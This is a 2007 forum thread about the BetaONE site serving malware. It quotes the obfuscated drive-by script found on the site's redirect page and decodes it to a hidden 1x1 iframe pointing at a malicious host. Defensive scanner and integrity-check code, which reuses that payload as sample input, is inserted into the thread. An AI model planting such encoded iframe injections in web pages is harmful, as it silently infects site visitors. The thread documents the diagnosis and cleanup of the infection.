BetaONE will rise again!


Alpine 1st Nov 07 02:32 PM

B1 Infected !
 
Each time I log on B1, I get a msg from Kaspersky!

Take a look!

User Needs 1st Nov 07 03:39 PM

What version of Kaspersky are you using?
I use Kaspersky 7 and have never had that happen!

Can you scan with
http://housecall.trendmicro.com/?WT.TM_clusty_flg=7
and post the results?

Oldbunny 1st Nov 07 05:01 PM

Quote:

Originally Posted by Alpine (Post 96947)
Each time I log on B1, I get a msg from Kaspersky!
Take a look!

Well.. one word about what Kaspersky doesn't like and what will always pop up as the msg above..
The board is set up to accept the "Privacy Report" icon which appears at the bottom of the board screen anywhere you go..
It just supports the "PayPal" listing here, which causes the firewall, antivirus and Internet Explorer itself to go into and stay in alert mode.. which wakes up Kaspersky's attention..
These warnings are fake and Kaspersky knows about it, but they never change that!

=========================
"Privacy Report":
RESTRICTED WEBSITE
https://www.paypal.com/en_US/i/btn/x-clickbut21.. - Blocked

=========================
This is part of the IE security setup.. and you are able to change it, so open that report and make your own change.. and in response Kaspersky will love that and stop such fake warnings!

Alpine 1st Nov 07 05:59 PM

Strange, because at the job I have version 7.0.0.125 and it does that!

At home, I have version 6 I think! But I haven't come on B1 from home for a few weeks!
I'm gonna test that tonight!!

Cyberion 2nd Nov 07 02:18 AM

I did go to betaone.net/ and was forwarded to a link site with a bunch of adult pictures, but I figured that I misspelled it.. kinda weird. And yes, AVG complained to me as well about there being a bug, but only at that forwarded site.

User Needs 2nd Nov 07 02:21 AM

I made a complete scan with Kaspersky 7.0.0.125 and nothing!

Alpine 2nd Nov 07 12:24 PM

Quote:

Originally Posted by Cyberion (Post 96998)
I did go to betaone.net/ and was forwarded to a link site with a bunch of adult pictures, but I figured that I misspelled it.. kinda weird. And yes, AVG complained to me as well about there being a bug, but only at that forwarded site.


I've got this prob at home too!!
This is not because of a misspelling! I've had it in my bookmarks for a few years and I never got this b4!

KingCobra 2nd Nov 07 06:21 PM

What browser is everyone using when they see the problem?

One might have a hole vs. another.

User Needs 2nd Nov 07 06:29 PM

I'm using IE7

Alpine 2nd Nov 07 09:10 PM

I am using IE7 and IE6!

DoG 3rd Nov 07 10:38 PM

I'm seeing this problem now on Firefox - will scan the server and see what's happening.

Voodoo 6th Nov 07 01:49 PM

I am now also getting this from Nod32. I also notice a few other websites loading when I go to BetaOne. :o

Cheerz
Voodoo

Voodoo 8th Nov 07 05:44 PM

BUMP :o

Can an admin look at this? As stated, a shitload of other sites are also loaded when you come here. Can't be good. :confused:

Cheerz
Dave

DoG 8th Nov 07 10:29 PM

The server was scanned and cleaned earlier this week - afaik it's still clean but will check. Are you sure you haven't been infected with spyware?

freezer121 9th Nov 07 07:54 AM

I've just got precisely the same as Voodoo from my NOD32. I think I'm clean but I'll check. I had no indications of a problem before today and was following the thread out of interest only - then Bingo! :)

Alpine 9th Nov 07 01:08 PM

I am clean on the 2 PCs I use to come over to B1! Both are still giving me this virus!!

I'll do another check on my PC right now!

DoG 9th Nov 07 10:16 PM

I scanned the server last night with KAV and Trend House Call but all was clean......

Cactus 11th Nov 07 08:47 PM

DoG,

Now don't tell me you really couldn't find this....

The first page when surfing to B1 is named "BetaONE Hotfix" and has the following HTML code:

Code:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
  <title>BetaONE Hotfix</title>
</head>

<body><Script Language="Javascript">document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%6E%39%36%2E%64%6E%73%2E%67%65%6E%64%69%73%74%72%2E%69%6E%66%6F%2F%71%75%61%6C%69%74%79%74%65%73%74%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>
  <meta http-equiv="refresh" content="0; url=http://www.betaone.net/forum" />
</body>

</html>

The Javascript code (unescaped) is
Code:

<iframe src="http://mn96.dns.gendistr.info/qualitytest" width=1 height=1></iframe>
That page (after some more site switching) eventually leaves you infected with what Symantec calls Trojan.Exploit.131 (see http://securityresponse.symantec.com...033008-3019-99), after which it loads the betaone.net/forum page as if all is well.

So sure, the server might not be infected, but the index.php contains code that will get you infected. Now don't tell me you didn't see this, I mean, come on ;)

Oh, and I saw today is your birthday. Congratulations! Have a beer on me!

Anyways,
Cheers,

Le Cactus
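The trick Cactus describes is the classic drive-by pattern: the iframe tag is percent-encoded so that a simple text search for "iframe" in the page source finds nothing, and `document.write(unescape(...))` reconstructs it in the browser as a 1x1 frame. The following is an added example (not code from the thread, the site, or any of the posters) that shows how a site operator can check their own HTML files for this: it reimplements JavaScript's `unescape()` (both `%XX` and `%uXXXX` forms), decodes every `document.write(unescape(...))` payload it finds, and reports iframes that are hidden by size or style. The sample input is constructed from the script tag quoted in the post above; the function and constant names are the example's own.

```python
"""Scan HTML for hidden iframes, including ones hidden inside unescape() payloads.

Added example for illustration; not part of the original thread or the site's code.
"""
import re
import sys

# Constructed sample input: the injected script tag quoted in the thread, wrapped in a page.
SAMPLE_HTML = """<html><head><title>BetaONE Hotfix</title></head>
<body><Script Language="Javascript">document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%6E%39%36%2E%64%6E%73%2E%67%65%6E%64%69%73%74%72%2E%69%6E%66%6F%2F%71%75%61%6C%69%74%79%74%65%73%74%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>
<meta http-equiv="refresh" content="0; url=http://www.betaone.net/forum" />
</body></html>"""

# JavaScript's unescape() decodes %XX (one byte) and %uXXXX (one UTF-16 unit).
_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")

# document.write(unescape('...')) or document.write(unescape("...")), whitespace tolerant.
_WRITE_UNESCAPE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1\s*\)\s*\)",
    re.IGNORECASE | re.DOTALL,
)
_IFRAME = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
_ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def js_unescape(s: str) -> str:
    """Decode a string the way JavaScript's unescape() does."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def parse_attrs(tag: str) -> dict:
    """Return {attribute: value} for one opening tag; quoted and bare values are accepted."""
    attrs = {}
    for m in _ATTR.finditer(tag):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def is_hidden(attrs: dict) -> bool:
    """1x1 or 0x0 frames, or display:none / visibility:hidden styles, are the usual hallmark."""
    def tiny(value: str) -> bool:
        try:
            return int(value.strip().rstrip("px")) <= 1
        except ValueError:
            return False
    style = attrs.get("style", "").replace(" ", "").lower()
    by_size = tiny(attrs.get("width", "")) and tiny(attrs.get("height", ""))
    return by_size or "display:none" in style or "visibility:hidden" in style


def find_hidden_iframes(html: str) -> list:
    """Return (where, src) for every hidden iframe: in plain markup or decoded from unescape()."""
    findings = []
    for tag in _IFRAME.findall(html):
        attrs = parse_attrs(tag)
        if is_hidden(attrs):
            findings.append(("plain", attrs.get("src", "")))
    for m in _WRITE_UNESCAPE.finditer(html):
        decoded = js_unescape(m.group(2))
        for tag in _IFRAME.findall(decoded):
            attrs = parse_attrs(tag)
            if is_hidden(attrs):
                findings.append(("unescape", attrs.get("src", "")))
    return findings


if __name__ == "__main__":
    # Usage: python scan_iframes.py [file.html ...]; with no arguments the constructed sample is scanned.
    sources = [(p, open(p, encoding="utf-8", errors="replace").read()) for p in sys.argv[1:]]
    for name, html in sources or [("SAMPLE_HTML", SAMPLE_HTML)]:
        for where, src in find_hidden_iframes(html):
            print(f"{name}: hidden iframe ({where}) -> {src}")
```

Run it over the document root (or over the output of `curl` against your own pages) after every suspected reinfection; because it decodes the payload rather than matching the encoded bytes, a change in the injected hostname does not defeat it, which is exactly the weakness of the antivirus scans described later in the thread.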

DoG 12th Nov 07 06:14 PM

I removed the erroneous script when I realised that it never used to be part of the hotfix page - then I saw your post and felt much happier :)
How's it going Cactus? Thanks for the birthday wishes :)

Voodoo 12th Nov 07 07:38 PM

Quote:

Originally Posted by DoG (Post 97471)
I removed the erroneous script when I realised that it never used to be part of the hotfix page -

Hi there Mike. All the other sites are still loading on my side? :eek: Tried Firefox as well as Opera.

Cheerz
Dave

DoG 13th Nov 07 03:54 AM

Try B1 again after clearing cookies. I cleaned the redirect screen.

freezer121 13th Nov 07 09:06 AM

I cleared my Firefox betaone cookie, restarted and brought up the site; NOD lit up again, this time with a different trojan name. I made a nonsense of capturing the screen so can't be more explicit - sorry.

Most worrying, I saw a reference to Paypal (bottom left of the screen) before I got to B1. Don't know if it was loading the Donate button or up to no good!

NOD terminated whatever was going on and asked me to submit the trojan, which I did.

Having spent most of yesterday morning scanning with Defender, Counterspy and NOD, I am confident NOD is keeping me clean - but it's quite an exciting ride to B1 these days. :lol:

Voodoo 13th Nov 07 01:37 PM

Got this again today:

It now seems to be loading even more sites than previously. :mad: If you compare this screenshot to the previous one, you will notice that the site is different. Oh, and I did clear my cookies. Get the same in IE7 and in Firefox.

:confused:

Cheerz
Dave

DoG 13th Nov 07 03:54 PM

It seems that there could be multiple instances of the exploit installed on different pages on the server. Might have to go through them one by one as virus scanners don't seem to be able to detect them on the server :(

Voodoo 14th Nov 07 07:53 PM

Mike, did you fix this? :D Much appreciated. :clapping:

Cheerz
Dave

freezer121 17th Nov 07 08:38 AM

It all seems fine now, thanks for fixing it. :)

KingCobra 17th Nov 07 06:18 PM

I have been surfing betaone with my Wii to be safe. Is the problem really fixed now? Where did it come from?

DoG 18th Nov 07 12:53 AM

It seems to have come from another web admin on the server installing a program with a security flaw or other vulnerability. Please be assured that the server is constantly being updated and regular AntiVirus scans do take place, it's just hard for any single AV program to catch all the numerous Windows exploits in circulation. The recent spate of problems stems from a trojan that inserted a JavaScript 'exploit' into one of the redirect pages for the B1 website. Unfortunately, once the system was cleaned of the trojan the JavaScript remained. The affected file was cleaned by hand and write protected to prevent any further problems. There was around a 24-hour delay before the users saw any benefit from the 'disinfection(?)' whilst local caches were cleared etc.
All should be fine now and I apologize for any inconvenience caused.

EDIT: @ Cactus: The index.php is fine, it's the portal redirect that isn't updated when we update the vBulletin software that was infected ;) A few permission changes on the server and a quick lookie see later and it's all sorted :) BTW, where the hell have you been??? It's been too long - PM me and come in from the wilderness ;) We miss ya bud!

Voodoo 18th Nov 07 06:28 PM

:mad:Shit, it is back again and now loads more sites than before? How can this be?

DoG, help. :eek:

Cheerz
Dave

DoG 19th Nov 07 12:32 AM

Fixed- again :angry:

Not sure what is going on but it seems that the file attributes were changed to allow the file to be written to again. I changed the security settings so it should be good now.
Clear all cookies and internet cache and try again please.
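What DoG describes above, a hand-cleaned and write-protected redirect page whose permissions were later changed back and which was then re-injected, is the situation a file-integrity baseline exists to catch, and it catches it whether or not an antivirus engine knows the particular script. The following is an added example (not a tool the admin used or anything from the site) of such a check: it records a SHA-256 digest and the permission bits of every regular file under a web root, compares a later snapshot against that baseline, and reports modified, added or removed files, permission changes, and files that are group- or world-writable. The web root path and baseline file name are whatever the operator chooses; `demo()` replays the thread's scenario in a temporary directory constructed for the example.

```python
"""Baseline-and-compare integrity check for a web root.

Added example for illustration; not code from the thread or the site.
"""
import hashlib
import json
import os
import shutil
import stat
import sys
import tempfile


def file_digest(path: str) -> str:
    """SHA-256 of a file's contents, read in chunks so large uploads do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: str) -> dict:
    """Map relative path -> {sha256, mode} for every regular file under root (symlinks skipped)."""
    snap = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            snap[rel] = {"sha256": file_digest(full), "mode": stat.S_IMODE(st.st_mode)}
    return snap


def writable_by_others(mode: int) -> bool:
    """True if group or world write bits are set: the state the thread's redirect page drifted back into."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def diff_snapshots(baseline: dict, current: dict) -> list:
    """Return (kind, path) findings: modified, added, removed, mode_changed, writable."""
    findings = []
    for path in sorted(set(baseline) | set(current)):
        before, now = baseline.get(path), current.get(path)
        if before is None:
            findings.append(("added", path))
        elif now is None:
            findings.append(("removed", path))
        else:
            if before["sha256"] != now["sha256"]:
                findings.append(("modified", path))
            if before["mode"] != now["mode"]:
                findings.append(("mode_changed", path))
        if now is not None and writable_by_others(now["mode"]):
            findings.append(("writable", path))
    return findings


def save_baseline(snap: dict, path: str) -> None:
    with open(path, "w") as f:
        json.dump(snap, f, indent=1, sort_keys=True)


def load_baseline(path: str) -> dict:
    with open(path) as f:
        return json.load(f)


def demo() -> list:
    """Constructed scenario: baseline a tiny web root, then tamper with it the way the thread describes."""
    root = tempfile.mkdtemp()
    try:
        page = os.path.join(root, "redirect.html")
        with open(page, "w") as f:
            f.write("<html><body>clean</body></html>")
        os.chmod(page, 0o444)                      # write-protected, as the admin did
        baseline = snapshot(root)
        os.chmod(page, 0o666)                      # attributes changed to allow writing again
        with open(page, "w") as f:                 # and the page re-injected
            f.write("<html><body>clean<script>/* injected */</script></body></html>")
        return diff_snapshots(baseline, snapshot(root))
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    # Usage: integrity.py baseline <webroot> <baseline.json> | check <webroot> <baseline.json>
    if len(sys.argv) == 4 and sys.argv[1] == "baseline":
        save_baseline(snapshot(sys.argv[2]), sys.argv[3])
    elif len(sys.argv) == 4 and sys.argv[1] == "check":
        found = diff_snapshots(load_baseline(sys.argv[3]), snapshot(sys.argv[2]))
        for kind, path in found:
            print(f"{kind}: {path}")
        sys.exit(1 if found else 0)
    else:
        print(demo())
```

Keep the baseline file outside the web root and owned by a different account than the one the web server or any co-hosted site runs as; otherwise whatever rewrote the redirect page can rewrite the baseline too. Run the check from cron and you learn about a reinjection within minutes instead of waiting for a forum member's antivirus to complain.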

Voodoo 19th Nov 07 02:27 PM

Thanks DoG, much appreciated. ;)

Cheerz
Dave

Voodoo 20th Nov 07 03:05 PM

DoG, guess who's back, back in town? :lol: Yip, them nasties are back.

Cheerz
Voodoo

DoG 21st Nov 07 02:13 AM

FFS, the server must still be infected somewhere. Will see what's been changed this time.

DoG 21st Nov 07 02:32 AM

Ok, the file that was being changed last time doesn't have the JavaScript in it. Searching all the other files in our section of the hdd but all is clear so far.

